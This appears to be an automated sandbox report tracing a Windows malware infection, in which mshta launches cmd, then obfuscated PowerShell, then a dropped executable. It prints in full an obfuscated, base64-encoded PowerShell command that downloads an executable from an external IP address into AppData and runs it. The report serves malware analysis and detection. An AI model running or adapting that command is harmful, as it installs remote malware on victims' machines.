                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: msimg32.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: msvcr100.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.pdb source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Unpacked PE file: 6.2.nicetomeetyousweeet.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Unpacked PE file: 6.2.nicetomeetyousweeet.exe.400000.0.unpack
                Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 6_2_0041BCE3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_028C42D1 push ebx; ret 3_2_028C42DA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_004567E0 push eax; ret 6_2_004567FE
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0045B9DD push esi; ret 6_2_0045B9E6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00455EAF push ecx; ret 6_2_00455EC2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00433FF6 push ecx; ret 6_2_00434009
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_005B5B7A pushfd ; ret 6_2_005B5B7B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_005B2D05 push es; ret 6_2_005B2D12
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007A409D push esi; ret 6_2_007A409F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007D6116 push ecx; ret 6_2_007D6129
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007B425D push ecx; ret 6_2_007B4270
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0078724F push edx; retf 6_2_00787252
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007D6A47 push eax; ret 6_2_007D6A65
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00795C73 push esp; ret 6_2_00795C74
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00795EC9 push edi; ret 6_2_00795ECA
                Source: ecome[1].exe.3.dr Static PE information: section name: .text entropy: 6.836898849534784
                Source: nicetomeetyousweeet.exe.3.dr Static PE information: section name: .text entropy: 6.836898849534784
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00406128 ShellExecuteW,URLDownloadToFileW, 6_2_00406128
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 6_2_00419BC4

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 6_2_0041BCE3
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
